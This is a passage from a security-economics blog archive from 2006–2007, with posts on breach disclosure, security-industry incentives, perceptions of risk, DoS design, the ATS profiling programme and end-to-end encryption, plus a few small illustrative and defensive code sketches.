    However, the liabilities (growing) and the interests (diverging) are going to be balanced and aligned, one way or another. The Internet security world today is out of balance, unsustainable in its posture.

    Here's my prediction: At some point we do reach a tipping point, and at that point the suits start.

    However, predicting re-balancing-by-suits has been a little like predicting the collapse of the dollar in the new not-quite-global-currency regime: when it did happen, we were caught by surprise. And then it bounced back again...

    So, no dates on that prediction. Let's watch for TJX copies.

    Posted by iang at 09:42 AM | Comments (2) | TrackBack

    April 19, 2007

    On cleaning up the security mess: escaping the self-perpetuating trap of Fraud?

    Two separate comments on the blog from a few days ago reach into the nub of the security mess. Adam comments:

    It's not that we're unable to propose solutions, it's that they're hard to compare. My assertion is that once we overcome the desire to hide our errors, we can learn to compare in better ways.

    And Lynn writes:

    Two separate studies recently reached conflicting conclusions: While one found that identity theft is on the rise significantly, the other reported that it is on the decline.

    So which is it?

    Addressing these in reverse order, we can expect two professionally-prepared scientific reports on the same subject to reach the same conclusion, unless there are some other factors involved.

    Firstly, it could be that we don't know enough (c.f., silver bullets). Secondly, it could be that we are not using scientific rigour, and the report is instead some for-profit advertisement. Or, thirdly, we could always simply be making a mistake.

    All reasons are plausible... but now look at Adam's comment. If we apparently have a desire to hide our errors, what does that say? Are we all snake-oil salesmen? Are we not scientists? Is security only sales and hype, with no professionalism in the field at all?

    If we were talking about a science, and/or a field conducted by professionals, then we could assume that while Lynn's case was possible, it would be infrequent: professionals would not draw conclusions if they did not know enough. Scientists wouldn't write for-profit advertisements, and although professionals might, they would be careful to disclose and disclaim. At the least, we would expose our data and ask for alternate analyses for the purpose of eliminating errors and mistakes.

    If we were scientists, we would recognise that the goal is knowledge, and the elimination of our own mistakes is the only way to advance knowledge. Having any desire whatsoever to cover our mistakes is incompatible with scientific method; indeed, it should be a joy to uncover our mistakes, as this is the only way to advance! And even professionals know that recognition and correction of mistakes is a core professional duty.

    This suggests then that security is not science and it is not a profession.

    Is security only the marketing of ephemeral goods and services?

    There is no moral difficulty in security being mere marketing. We humans have the right to make money, and spend it on what we like. If companies buy hype then let us sell them hype.

    However, even in marketing there are limits. Even in marketing, we say that statements must be true. Even in marketing, professionalism exists.

    Why is this? Perhaps it is time to consider a dramatic alternate to the true statement: Fraud.

    Under common law, three elements are required to prove fraud: a material false statement made with an intent to deceive (scienter), a victim’s reliance on the statement and damages.

    In today's Internet security world, we have damages, in Lynn's above-mentioned reports, whether up or down. We also have reliance by users on browsers, operating systems, CAs and server security. The intent to deceive is easy to show in the context of sales.

    Do we have material false statements?

    If the security industry was brought before the court of common law, I'd suggest that there's a pretty good chance that it would be found guilty of fraud!

    Which is why Adam's assertion is so pertinent. Once we have committed fraud, we have also committed to covering it up. Fraud practitioners know that a strong signal of fraud is hiding the results, a desire to hide errors.

    Fraud practitioners also know that fraud is a trap; once a small fraud is committed, we have to commit another and another, bigger and bigger. And each becomes easier, mentally speaking, than the first.

    The security industry is caught in the trap of fraud: we are perpetually paying for the material false statements of our past, with bigger and bigger frauds. Where does this end?

    Posted by iang at 07:39 AM | Comments (1) | TrackBack

    April 17, 2007

    Our security sucks. Why can't we change? What's wrong with us?

    Adam over at EC joined the fight against the disaster known as Internet Security and decided Choicepoint was his wagon. Mine was phishing, before it got boring.

    What is interesting is that Adam has now taken on the meta-question of why we didn't do a better job. Readers here will sympathise. Read his essay about how the need for change is painful, both directly and broadly:

    At a human level, change involves loss and the new. When we lose something, we go through a process, which often includes shock, anger, denial, bargaining and acceptance. The new often involves questions of trying to understand the new, understanding how we fit into it, if our skills and habits will adapt well or poorly, and if we will profit or lose from it.

    Adam closes with a plea for help on disclosure:

    I'm trying to draw out all of the reasons why people are opposed to change in disclosure habits, so we can overcome them.

    I am not exactly opposed but curious, as I see the issues differently. So in a sense, deferring for a moment a brief comment on the essay, here are a few comments on disclosure.

    1. Disclosure is something that is very hard to isolate. SB1386 was a big win, but it only covered the easy territory: you, bad company, know the victim's name, so tell them.
    2. Disclosure today doesn't cover what we might call secondary disclosure, which is what Adam is looking for. As discussed by Schechter and Smith, and in my Market for Silver Bullets (see the toy sketch after this list):

      Schechter & Smith use an approach of modelling risks and rewards from the attacker's point of view which further supports the utility of sharing information by victims:

      Sharing of information is also key to keeping marginal risk high. If the body of knowledge of each member of the defense grows with the number of targets attacked, so will the marginal risk of attack. If organizations do not share information, the body of knowledge of each one will be constant and will not affect marginal risk. Stuart E. Schechter and Michael D. Smith "How Much Security is Enough to Stop a Thief?", Financial Cryptography 2003 LNCS Springer-Verlag.

      Yet, to share raises costs for the sharer, and the benefits are not accrued to the sharer. This is a prisoner's dilemma for security, in that there may well be a higher payoff if all victims share their experiences, yet those that keep mum benefit from others' sharing without bearing its costs. As all potential sharers are joined in an equilibrium of secrecy, little sharing of security information is seen, and this is rational. We return to this equilibrium later.

    3. Disclosure implies the company knows what happened. What if they don't?
    4. Disclosure assumes that the company will honestly report the full story. History says they won't.
    5. Disclosure of the full story is only ... part of the story. "We lost a laptop." So what? "Don't do that again..." is hardly a satisfactory, holistic or systemic response to the situation.

      (OK, so some explanation. At what point do we forget the nonsense touted in the press and move on to a real solution where the lost data doesn't mean a compromise? IOW, "we were given the task of securing all retail transactions......")
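
    Here is the toy sketch promised in item 2: my own back-of-envelope rendering of the Schechter & Smith point, with made-up numbers, not their model. When victims share, every attack adds to every defender's knowledge, so the attacker's chance of surviving a campaign undetected collapses; without sharing, each defender learns nothing from the others and the attacker's per-attack risk stays flat.

        def p_all_undetected(n_attacks, base_detect, learn_rate, sharing):
            # Probability the attacker survives n_attacks without being caught.
            p_survive, shared_lessons = 1.0, 0
            for _ in range(n_attacks):
                p_detect = min(1.0, base_detect + learn_rate * shared_lessons)
                p_survive *= 1.0 - p_detect
                if sharing:
                    shared_lessons += 1   # the lesson propagates to all targets
            return p_survive

        for sharing in (False, True):
            print(sharing, round(p_all_undetected(20, 0.05, 0.02, sharing), 3))
        # False 0.358 -- risk per attack stays at 5%
        # True 0.003  -- marginal risk rises with every shared lesson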

    So, while I think that there is a lot to be said about disclosure, I think it is also a limited story. I personally prefer some critical thought -- if I can propose half a dozen solutions to some poor schmuck company's problems, why can't they?

    And it is to that issue that Adam's essay really speaks. Why can't we change? What's wrong with us?

    Posted by iang at 03:42 PM | Comments (5) | TrackBack

    April 06, 2007

    What to do about responsible disclosure?

    A slight debate has erupted over Adam's presentation "Security Breaches are good for you" which makes it a success. Of course, Adam means good for the rest of us, not the victims. One can consider two classes of beneficiaries of breach information:

    1. The individuals directly concerned. They can work out how their risks change from past events. In order for them to do anything to protect themselves, they have to be told; a company can't do it for them because it doesn't understand their situation.
    2. Companies that have similar setups. They can work out better how to defend against future events. This comes from both understanding the weaknesses and exploits, and also the risks and costs. This viewpoint is due to Stuart E. Schechter and Michael D. Smith, "How Much Security is Enough to Stop a Thief?", Financial Cryptography 2003, LNCS Springer-Verlag. At least that's where I first saw a rational explanation, even though I have been thinking about the "secrecy is bad for you" angle for many years.

    SB1386 and copies address the first case, but what about the second case? Kenneth F. Belva simply doesn't agree with it. He blogs that we can't release all this information for security reasons; we don't release security-sensitive info because it gives an attacker an advantage.

    This I claim is a facade. I believe that when people say "cannot release that for security-sensitive reasons," there are generally other, real reasons. Primarily, it is the safety of the people doing the job: they can do their job much more happily if they can avoid the scrutiny that disclosure forces. Adam says (PDF):

    So, why can’t we share? There are four reasons usually given: liability, embarrassment, customers would flee, and we might lose our jobs.

    I quote Dan Geer as saying “No CSO on Wall Street has the authority to share even firewall logs because no General Counsel can see the point.”

    Beyond all the excuses, I think there is a much bigger danger: that security people can do their jobs much more badly when protected by secrecy. Disclosure forces all of us to defend our position and to be judged by our peers, and trotting out the "secrecy" argument is IMO almost always used to cover bad work, not a real security risk.

    That's not to say that any particular professional is bad, but that the profession as a whole, as a guild, promotes bad professional behaviour, behind the curtain of secrecy. That said, there is an element of truth in the issue. We don't disclose the root password, so where is the line drawn? Kenneth says:

    Just as we have an understanding of responsible disclosure now for technical information security vulnerabilities, we need the same for breach disclosure.

    If not through a centralized (not necessarily government) body, Adam, what do you propose that would allow for better, more accurate and confidential disclosure that does not leak sensitive information?

    Disclosures are not possible if done via some "controlled" channel. As Adam points out and as economic theory has it (following Stigler), all closed channels become controlled, stifled and then neutered (and what happens after is sometimes even worse). This is as true in the infosec world as any other.

    So maybe we need a law to force public disclosure? Right?

    I call it wrong. SB1386 was a big win because it forced 1. above. This was in no small part because the issue was simple: just write to the victims and tell them what was lost. The harm was clear, the victims were directly known, and they just needed to be told.

    Part 2 is much harder. I doubt a law can do it, and I further doubt a law can do any good there at all. There is no victim being targeted, there is no simple harm, and there is indeed no direct or contractual relationship here at all.

    We simply have no guidance to make such a law. SB1386 was a lucky break: it spotted a precise niche, and filled it. We should *not* take SB1386 as anything but an extraordinarily lucky break, and we should not expect to repeat it.

    So where does that leave us with respect to responsible disclosure? It will then fall to the companies to decide what to do ... and obviously it is far far safer to say nothing than say something. That doesn't make it right, just safer for those whose jobs are at risk.

    I talk about solutions in silver bullets. Adam dares:

    I am challenging everyone to face those fears, and work to overcome them. I believe that there's tremendous value waiting to be unlocked.

    Lack of solid info on breaches is one reason it is so hard to defend against real risks; e.g., why phishing was able to develop unimpeded: nobody dared to talk about it when it happened to them, and anyone who did was pooh-poohed by those who hadn't figured it out yet.

    (Quick quiz -- what's your defence against MITB? is it (a) never heard about it, in which case you are a victim of the secrecy myth, (b) have one but can't say, in which case you are perpetuating unsafety through secrecy, or (c) something else?)

    Posted by iang at 04:35 PM | Comments (5) | TrackBack

    March 10, 2007

    Feelings about Security

    In the ongoing saga of "what is security?" and more importantly, "why is it such a crock?" Bruce Schneier weighs in with some ruminations on "feelings" or perceptions, leading to an investigation of psychology.

    I think the perceptional face of security is a useful area to investigate, and the essay shines as a compendium of archetypal heuristics, backed up by experiments, and written for a security audience. These ideas can all be fed into our security thinking, not to be taken for granted, but rather as potential explanations to be further tested. Recommended reading, albeit very long...

    I would however urge some caution. I claim that buyers and sellers do not know enough about security to make rational decisions; the essay suggests a perceptional deviation as a second uncertainty. Can we extrapolate strongly from these two biases?

    As it is a draft, requesting comment, here are three criticisms, which suggest that the introduction of the essay is unsustainable:

    THE PSYCHOLOGY OF SECURITY -- DRAFT

    Security is both a feeling and a reality. And they're not the same.

    The reality of security is mathematical, based on the probability of different risks and the effectiveness of different countermeasures.

    Firstly, I'd suggest that "what security is" is not yet well defined, and has defied our efforts to come to terms with it. I say a bit about that in Pareto-secure, but there I'm only really looking at a single aspect of why cryptographers are so focussed on no-risk security.

    Secondly, both maths and feelings are approximations, not the reality. Maths is just another model, based on some numeric logic as opposed to intuition.

    What one could better say is that security can be viewed through a perceptional lens, and it can be viewed through a mathematical lens, and we can probably show that the two views look entirely different. Why is this?

    Neither is reality though, as both take limited facts and interpolate a rough approximation, and until we can define security, we can't even begin to understand how far from the true picture we are.

    We can calculate how secure your home is from burglary, based on such factors as the crime rate in the neighborhood you live in and your door-locking habits. We can calculate how likely it is for you to be murdered, either on the streets by a stranger or in your home by a family member. Or how likely you are to be the victim of identity theft. Given a large enough set of statistics on criminal acts, it's not even hard; insurance companies do it all the time.

    Thirdly, insurance is sold, not bought. Actuarial calculations do not measure security to the user but instead estimate risk and cost to the insurer, or more pertinently, insurer's profit. Yes, the approximation gets better for large numbers, but it is still an approximation of the very limited metric of profitability -- a single number -- not the reality of security.

    What's more, these calculations cannot be used to measure security. The insurance company is very confident in its actuarial calculations because it is focussed on profit; for the purpose of this one result, large sets of statistics work fine, as well as large margins (life insurance can pay out 50% to the sales agent...).
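
    To put a number on that distinction, a minimal actuarial sketch, with every input a made-up illustrative value: the premium is expected loss plus a loading for sales, administration and profit, and nothing in it measures the householder's actual security.

        p_burglary = 0.03     # annual probability, from neighbourhood statistics
        avg_loss = 8_000      # average insured loss per burglary, in dollars
        loading = 0.5         # margin for sales, admin and profit

        expected_annual_loss = p_burglary * avg_loss     # 240.0
        premium = expected_annual_loss * (1 + loading)   # 360.0

        # Absent from the calculation: whether the lock is actually used,
        # what irreplaceable items are worth, whether the household is in
        # the drugs trade. The profit-oriented number says nothing about
        # the security the user actually enjoys.
        print(expected_annual_loss, premium)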

    In contrast, security -- as the victim sees it -- is far harder to work out. Even if we stick to the mathematical treatment, risks and losses include factors that aren't amenable to measurement, nor to accurate dollar figures. E.g., if an individual is a member of the local hard drugs distribution chain, not only might his risks go up and his losses go down (life expectancy is generally lowered in that profession), but also: how would we find out when and how to introduce this skewed factor into his security measurement?

    While we can show that people can be sold insurance and security products, we can also show that the security they gain from those products has no particular closeness to the losses they incur (if it was close, then there would be more "insurance jobs").

    We can also calculate how much more secure a burglar alarm will make your home, or how well a credit freeze will protect you from identity theft. Again, given enough data, it's easy.

    It's easy to calculate some upper and lower bounds for a product, but again these calculations are strictly limited to the purpose of actuarial cover, or insurer's profit.

    They say little about the security of the user, and they probably play as much to the feelings of the buyer as to any mathematical model of the seller's risks and losses.

    It's my contention that these irrational trade-offs can be explained by psychology.

    I think that's a tough call, on several levels. Here's some contrary plays:

    • Peer pressure explains a lot, and while that might feel like psychology, I'd suggest it is simple game theory.
    • Ignorance is a big factor (c.f., insufficient information theory).
    • Fear of being blamed also plays its part, which is more about agent/principal theory and incentives. It may matter less whether you judge the risk well than whether you lose your job!
    • Transaction cost economics (c.f., Coase, Williamson) has a lot to say about some of the experiments (footnotes 16,17,51,52).
    • Marketing feeds into security, although perhaps marketing simply uses psychology -- and other tools -- to do its deeds.

    If we put all those things together, a complex pattern emerges. I look at a lot of these elements in the market for silver bullets, and, leaning heavily on the Spencerian theory of symmetrically insufficient information, I show that best practices may emerge naturally as a response to costs of public exposure, and not the needs for security. Some of the experiments listed (24,38) may actually augment that pattern, but I wouldn't go so far as to say that the heuristics described are the dominating factor.

    Still, in conclusion, irrationality is a sort of code word in economics for "our models don't explain it, yet." I've read the (original) literature of insufficient information (Spence, Akerlof, etc) and found a lot of good explanations. Psychology is probably an equally rewarding place to look, and I found the rest of the article very interesting.

    Posted by iang at 12:20 PM | Comments (7) | TrackBack

    February 10, 2007

    On starting afresh with Security...

    The gut-wrenching fight over who we want to be continues over at Mozilla. In a status update, Mitchell posts on the evolving Principles:

    SPECIFICITY: There were a set of comments about the Manifesto not being specific, either about the nature of the goal or the steps we might take to get there. This was intentional on my part. With regard to specificity of the goals, I’m not sure we know now. And I’m pretty sure that interpretations will change. For example, what does security mean? We know it means security vulnerabilities -- problems with code that allow malicious actors too much room to move. More recently, “phishing” has become a serious problem. It’s not a classic code vulnerability though, so any definition of security that focused solely on code would be too limited. There will undoubtedly be other types of problems that will come up. So if we try to define “security” today it may be incomplete and it will undoubtedly be incomplete in the future.

    My hope is that the Manifesto sets a stake in the ground that the broad topic of security is fundamental. Then a variety of groups can engage in more detailed discussions of what this means for them and what steps they will take. The Mozilla Foundation will clearly focus on products, technology and user interaction. Other groups can set out other specific tasks that contribute to improved Internet security.

    That's just what I wanted to say ...

    The recognition that security has failed has tracked the rise of phishing, growing through the years 2003-2004, but has been reinforced by data breaches, DDOS, botnets, etc. Those who saw the widening dichotomy between actual breaches and peacock strutting of the security industry started to ask questions. Is there one security or two? Is it possible to be secure and not secure at the same time? Is there any point in talking about security at all, or is it all risk management? Who should we be securing, and what are we paying for?

    Certainly, the discussion can only start with a fairly brave admission: We certainly stuffed that up, didn't we! Until we get over that barrier, until we recognise the awful gut-twisting fact that as a discipline, we said we could do it and we didn't, we won't ever be able to address the problems.

    Mozilla makes the point above; has your organisation declared its security failures to the public lately?

    Posted by iang at 08:46 AM | Comments (1) | TrackBack

    February 01, 2007

    EV - what was the reason, again?

    A debate is bubbling over in securityland about the (shock, horror) service of typing in your SSN to get a seen-in-the-wild check. You can try it yourself.

    I tried typing in 123 456 789 and it told me to p**s off ... drats, it's clever!

    But meanwhile, I spotted down at the bottom that there is a "Verisign secured" seal at the bottom. Oh, that means something, doesn't it? So I clicked it. It took me to Verisign. (Don't believe me ... click on the seal yourself ... PLEASE... and spot the <ahem> slight flaw :)

    But anyways, ==> Verisign <== then says:

    1/2/2007 23:02 www.stolenidsearch.com uses VeriSign services as follows:

    SITE NAME: www.stolenidsearch.com

    SSL CERTIFICATE
    STATUS: Valid (13-Jan-2007 to 13-Jan-2008)

    COMPANY/
    ORGANIZATION: TRUSTEDID INC
    Redwood City
    California, US

    Encrypted Data Transmission This Web site can secure your private information using a VeriSign SSL Certificate. Information exchanged with any address beginning with https is encrypted using SSL before transmission.
    Identity Verified TRUSTEDID INC has been verified as the owner or operator of the Web site located at www.stolenidsearch.com. Official records confirm TRUSTEDID INC as a valid business.

    For your best security while visiting sites, always make sure the address of the visited site matches the address you are expecting to see. Make sure that the URL of this page begins with "https://seal.verisign.com"
    >>REPORT SEAL MISUSE

    (highlighting the interesting bit there ...)

    So, there we have it. Verisign says that TrustedId Inc, d.b.a. "StolenIdSearch", is a valid business. If they misuse your SSN, go after them.

    What was the need for EV then, again?

    Addendum: The site responds to criticism.

    Posted by iang at 05:12 PM | Comments (7) | TrackBack

    January 13, 2007

    More on why Security isn't working -- it's in your Brain?

    The push to rethink security is gaining momentum. Last week I posted the abstract of a pending keynote from FC2007, which commented on the desire to let the bad guys direct your security thinking. This week, I see a curious remark in a DDJ article concerning Bruce Schneier, who has been seen more and more around economics circles:

    His latest work is on brain heuristics and perceptions of security, and he'll be doing a presentation on that topic at the RSA Conference next month. "I'm looking at the differences between the feeling and reality of security," he says. "I want to talk about why our perceptions of risk don't match reality, and there's a lot of brain science that can help explain this."

    I await with interest, because although I am skeptical, I find I can't dismiss it, and it is a new direction that at the least may make us think about the possibilities. There is some support for this from the economics of irrationality, an emerging view in economics that suggests that rationality has been overdone, and that irrationality, sometimes a.k.a. emotions, plays more of a part than we think. From the Economist report on tests of price versus product decision making:

    The researchers found that different parts of the brain were involved at different stages of the test. The nucleus accumbens-known from previous experiments to be involved in processing rewarding stimuli such as food, recreational drugs and monetary gain, as well as in the anticipation of those rewards-was the most active part when a product was being displayed. Moreover, the level of its activity correlated with the reported desirability of the product in question.

    When the price appeared, however, fMRI reported more activity in other parts of the brain. Excessively high prices increased activity in the insular cortex, a brain region linked to expectations of pain, monetary loss and the viewing of upsetting pictures. The researchers also found greater activity in this region of the brain when the subject decided not to purchase an item.

    Price information activated the medial prefrontal cortex, too. This part of the brain is involved in rational calculation, and is known from previous experiments using trading games to be involved in balancing the expected and actual outcomes of monetary decisions. In this experiment its activity seemed to correlate with a volunteer's reaction to both product and price, rather than to price alone. Thus, the sense of a good bargain evoked higher activity levels in the medial prefrontal cortex, and this often preceded a decision to buy.

    OK, but that's economics and in particular behaviour during buying. What's that got to do with security? Maybe the link is the one I speculate on in the market for silver bullets; in that model, I claim that the buyer and seller know less than needed to make a rational decision (classical 2x2 description). Then, silver bullets arise because they act as rational signals shared across the market place. (You too can speculate in the FC++ edition.)

    What I glossed over was the mechanism by which each device is selected for the hallowed status of silver bullet -- I felt that the means was less relevant than the result. However, maybe economics, psychology and brain patterns can tell us something about how this happens:

    His hypothesis is that rather than weighing the present good against future alternatives, as orthodox economics suggests happens, people actually balance the immediate pleasure of the prospective possession of a product with the immediate pain of paying for it.

    If you read the entire article, you, like me, might ponder whether we can avoid pain and pleasure when testing innocent victims with boxes of chocolates.

    Posted by iang at 02:51 PM | Comments (1) | TrackBack

    January 06, 2007

    Now, *that's* how to do security...

    Some good articles on how to do security. Firstly, the Security Bloke at Skype talks.

    And secondly, someone in the USG reveals willingness to "know thy enemy," something generally out of favour in bureaucratic circles, and so immoral in some that it's probably illegal.

    I've written before about the necessity to understand the conundrum of the hacker as essential to our security.

    That is ... without actually endorsing the actions of our enemy, knowing him is your only way forward to victory. That's also the message at the end of this article, which, while full of contradictions like "throw out your prejudices" and "trust your gut", did have some good thoughts.

    Posted by iang at 12:30 PM | Comments (5) | TrackBack

    December 26, 2006

    Changing the Mantra -- RFC 4732 on rethinking DOS

    A couple of years ago I wrote that we should stop thinking about DOS -- denial of service attacks -- as something we don't do anything about in design phases simply because we can't stop it. The net community had adopted a sort of "institutional defeatism" which was causing problems because we weren't properly thinking through the ramifications of some of our choices.

    I proposed that a security protocol should make DOS no worse than it was without the protocol, which at least theoretically removes the temptation for the user to turn the security off. That eliminates the easy attack against the user's security. Further, we help the popularity of the security protocol, and hopefully just thinking about this objective gets the designer looking for ways to reduce DOS.
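
    One classic trick for meeting that "no worse" objective is the stateless cookie of Photuris and IKE: the responder spends no memory and no expensive cryptography until the initiator proves it can receive packets at its claimed address. A minimal sketch, with names and parameters of my own choosing:

        import hashlib, hmac, os, time

        SERVER_SECRET = os.urandom(32)   # rotated periodically in a real design

        def make_cookie(client_addr: str) -> bytes:
            # Cheap keyed hash; the server stores no per-client state.
            epoch = int(time.time()) // 60
            msg = f"{client_addr}|{epoch}".encode()
            return hmac.new(SERVER_SECRET, msg, hashlib.sha256).digest()

        def check_cookie(client_addr: str, cookie: bytes) -> bool:
            # A real design would also accept the previous epoch's cookie.
            return hmac.compare_digest(cookie, make_cookie(client_addr))

        # Only after check_cookie() passes does the expensive key agreement
        # begin, so the protocol adds no state-exhaustion or amplification
        # opportunity beyond what plain unauthenticated traffic allows.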

    Lynn now points to a new RFC on DOS, which primarily aims at the same thing: getting people to think about DOS when they build their systems:

    4732 I Internet Denial-of-Service Considerations, Handley M., IAB, Rescorla E., 2006/12/22 (38pp)

    This document provides an overview of possible avenues for denial-of-service (DoS) attack on Internet systems. The aim is to encourage protocol designers and network engineers towards designs that are more robust. We discuss partial solutions that reduce the effectiveness of attacks, and how some solutions might inadvertently open up alternative vulnerabilities.

    A quick skim through indicates that it includes a good list of the many classical DOS techniques, and also a useful list of defences.

    Posted by iang at 10:43 AM | Comments (1) | TrackBack

    December 09, 2006

    ATS and the death of a thousand tiny cuts

    If I was a terrorist, this would be great news. The US has revealed yet another apparently illegal and plainly dumb civilian spying programme, called ATS or Automated Targeting System. Basically, it datamines all passenger info, exactly that which they were told not to do by Congress, and flags passengers according to risk profile.

    Those who are responsible for US Homeland Insecurity had this to say:

    Jayson Ahern, an assistant commissioner of the Department of Homeland Security's Customs and Border Protection Agency, told AP: "If (the ATS programme) catches one potential terrorist, this is a success."

    From an FC perspective it is useful to see how other people's security thinking works. Let's see how their thinking stacks up. I think it goes like this:

    1. If we catch lots of terrorists we are winning the war on terror, so vote us back in.
    2. If we catch one terrorist, it's a success, so we must reinforce our efforts.
    3. If we catch no terrorists, we must try harder, so we need more data and programmes.

    See the problem? There's no feedback loop, no profit signal, no way to cull out the loss-making programmes. The only success criterion is in the minds of the people who are running the show.

    Meanwhile, let's see how a real security process works.

    1. Identify the objectives of the enemy.
    2. Figure out which of those objectives are harmful to us, and which are benign.
    3. Figure out how to make the harmful objectives loss-making to the enemy, and acceptable to us.
    4. Redirect the enemy's attention to objectives that do us no harm.
    5. Wait.

    Approximately, the objectives of the terrorists are to deliver the death of a thousand tiny cuts to the foreign occupiers, to draw from the Chinese parable. In other words, to cause costs to the US and their hapless friends, until they give up (which they must eventually do unless they have some positive reward built in to their actions).

    So let's examine the secret programme from the point of view of the terrorist. Obviously, it was no real secret to the terrorists ("yes, they will be monitoring the passenger lists for Arab names and meals....") and it is relatively easy to avoid ("we have to steal fresh identities and not order meals"). What remains is a tiny cut magnified across the entire flying public, and a minor inconvenience to the terrorist. Because it is known, it can be avoided when needed.

    We can conclude then that the ATS is directly aligned with the objectives of the terrorists. But there's worse, because it can even be used against the USA as a weapon. Consider this one again:

    "If (the ATS programme) catches one potential terrorist, this is a success."

    Obviously, one basic strategy is for the terrorists to organise their activities to avoid being caught. Or, a more advanced strategy is to amplify the effect of the US's own weapon against them. As the results of the ATS are aligned with objectives of the terrorists -- death by a thousand tiny cuts -- they can simply reinforce it. More and deeper cuts...

    Get it? As a terrorist campaign, what would be better than inserting terrorists into the passenger lists? The programme works, so catching some terrorists causes chaos and costs to the enemy (e.g., the recent shampoo debacle). The programme works, so it is a success, therefore it must be reinforced. And it works predictably, so it is easy to spoof.

    Even if the terrorist fails to get caught, he wins with some minor panic at the level of exploding shoes or shampoo bottles. And, if the suicide bomber is anything to go by, there is only a small cost to the terrorists as an organisation, and a massive cost to the enemy: consider the cost of training one suicide bomber (cheap if you want him to be caught, call it $10k) versus the cost of dealing with a terrorist that has been caught (publicly funded defence, decades of appeals, free accommodation for life, private jets and bodyguards..., call it $10m per "success").

    Not to mention the megaminutes lost in the entire flying public removing their shoes. For the terrorist, ATS is the perfect storm of win-wins -- there is no lose square for him.
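
    Putting the two illustrative figures from above into a back-of-envelope cost-exchange ratio (both numbers are guesses, not data):

        attacker_cost = 10_000        # training one expendable operative
        defender_cost = 10_000_000    # trial, appeals, lifetime custody per "success"

        print(f"cost exchange ratio: {defender_cost // attacker_cost:,} : 1")
        # cost exchange ratio: 1,000 : 1 -- each "success" costs the defender
        # a thousand times what it costs the attacker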

    On the other hand, if our security thinking was based on risk management, we'd simply use any such system for tracking known targets and later investigation of incidents. Or turn it off, to save the electricity. Far too many costs for minimal benefit.

    Luckily, in FC, we have that feedback loop. When our risk management programmes show losses, or our capital runs out, the plug is pulled. Maybe it is time to float the DHS on the LSE?

    Posted by iang at 12:33 PM | Comments (5) | TrackBack

    December 01, 2006

    CFP - Computer Security Foundations

    Twan says of WEIS: "Darn, why did I miss this workshop!? ... interesting stuff" Me too. Here's another one:

    Call For Papers

    20th IEEE Computer Security Foundations Workshop (CSF)
    Venice, Italy, July 6 - 8, 2007

    Sponsored by the Technical Committee on Security and Privacy
    of the IEEE Computer Society

    CSF20 website: http://www.dsi.unive.it/CSFW20/
    CSF home page: http://www.ieee-security.org/CSFWweb/
    CSF CFP: http://www.cs.chalmers.se/~andrei/CSF07/cfp.html

    The IEEE Computer Security Foundations Workshop (CSF) series brings together researchers in computer science to examine foundational issues in computer security. Over the past two decades, many seminal papers and techniques have been presented first at CSF. The CiteSeer Impact page lists CSF as 38th out of more than 1200 computer science venues in impact (top 3.11%) based on citation frequency. There is a possibility of upgrading CSF to an IEEE symposium already in 2007.

    New theoretical results in computer security are welcome. Also welcome are more exploratory presentations, which may examine open questions and raise fundamental concerns about existing theories. Panel proposals are welcome as well as papers. Possible topics include, but are not limited to:

    - Authentication
    - Access control
    - Distributed systems security
    - Information flow
    - Trust and trust management
    - Security for mobile computing
    - Security protocols
    - Security models
    - Executable content
    - Anonymity and Privacy
    - Intrusion detection
    - Decidability and complexity
    - Electronic voting
    - Data and system integrity
    - Formal methods for security
    - Network security
    - Database security
    - Resource usage control
    - Language-based security
    

    Proceedings published by the IEEE Computer Society Press will be available at the workshop, and selected papers will be invited for submission to the Journal of Computer Security.

    Important Dates

    Papers due:                   Monday, February 5, 2007
    Panel proposals due:          Thursday, March 15, 2007
    Notification:                 Monday, March 26, 2007
    Camera-ready papers:          Friday, April 27, 2007
    Workshop:                     July 6-8, 2007

    Workshop Location

    The 20th IEEE Computer Security Foundations Workshop will be held in the facilities of Venice International University, located on the island of San Servolo, about 10 minutes by water ferry from the Piazza San Marco.

    More details: http://www.cs.chalmers.se/~andrei/CSF07/cfp.html

    Posted by iang at 03:40 PM | Comments (0) | TrackBack

    November 24, 2006

    Who has a Core Competency in Security?

    A debate over at Ravichar, McKeay, EC asks whether a core competency in security could make a difference. Some notes.

    Core competencies are much misunderstood. They are things that, almost by definition, are very strong, uncopiable, and rather rare. For example, most auto manufacturers make good engines, but Honda has a core competency in building small petrol engines with efficient profiles -- that was the opinion of Porsche, no slouch in engine design themselves.

    Most ordinary companies will do well just using security as a competency (non-core) which means they can do it for most purposes and reasonably well.

    For example, one could suggest that Apple has security as a competency; they've always been reasonable at it, and have never really drifted far from a relatively secure product. We could also suggest that Microsoft are working on a decade long project to add a security competency.

    But for some sectors, something more is needed. For a CORE competency in security we'd have to look further; the tiny word has more significance than it seems.

    I'd pick IBM in the heyday, back in the 70s and 80s. IBM was the one always chosen by the banks to do the really difficult stuff in security. They had the people to build entire new systems. E.g., before public key was fashionable, IBM built it all with secret keys, and that included the systems to deliver the secret keys! They were the ones who had the strength to create DES, in the days when nobody much could spell cryptography, let alone understand its market purpose. In the 90s, the core competency lived on as banks chose IBM to do SET (something that a lot of companies discovered to their horror...) because IBM was it in security systems.

    Who has a core competency in security these days? Nothing obvious springs to mind.

    Posted by iang at 08:56 PM | Comments (6) | TrackBack

    What is the point of encrypting information that is publicly visible?

    The Grnch asks, in all honesty:

    > What is the point of encrypting information that is publicly visible?

    To which the answer is:

    To remove the security weakness of the decision.

    This weakness is the decision required to determine what is "publicly visible" or not. Or, more generally, what is sensitive or not.

    Unfortunately, there is no algorithm to determine those two sets. Software can't make that decision, so it falls to humans. Unfortunately, humans have no good algorithm either -- they can make quick value judgements, they can make bad value judgements, or they can turn the whole thing off. Worse still, it often falls to software engineers to make the decision (e.g., HTTPS), and not only are engineers poor at making such judgements, they don't even have the local contextual information to inform them. That is, they have no clue what the user wants protected.

    The only strategy then is to encrypt everything, all the time. This feeds into my third hypothesis:

    There is only one mode, and it is secure.

    I'm being very loose here in the use of the word "secure" but suffice to say, we include encryption in the definition. But it also feeds into another hypothesis of mine:

    Only end-to-end security is secure.

    For the same reasons ... if we introduce a lower layer security mechanism, we again introduce a decision problem. Following on from the above, we can't trust the software to decide whether to encrypt or not, because it has no semantic wisdom with which to decide. And we can't trust the user...

    Which gives rise to the knowledge problem. Imagine a piece of software that has a binary configuration for own-security versus rely-on-lower-layers. A button that says "encrypt / no-encrypt", which you set according to whether the lower layer has its own security, for example. There is, so the theory goes, no point in encrypting if the lower layer does it.

    But, how does it know? What can the software do to reliably determine whether the lower layer has encryption? Consider IPSec ... how do we know whether it is there? Consider your firewall sysadmin ... who came in on the weekend and tweaked the rules ... how do we know he didn't accidentally open something critical up? Consider online account access through a browser ... how do we know that the user has secured their operating system and browser before opening Internet Explorer or Firefox?

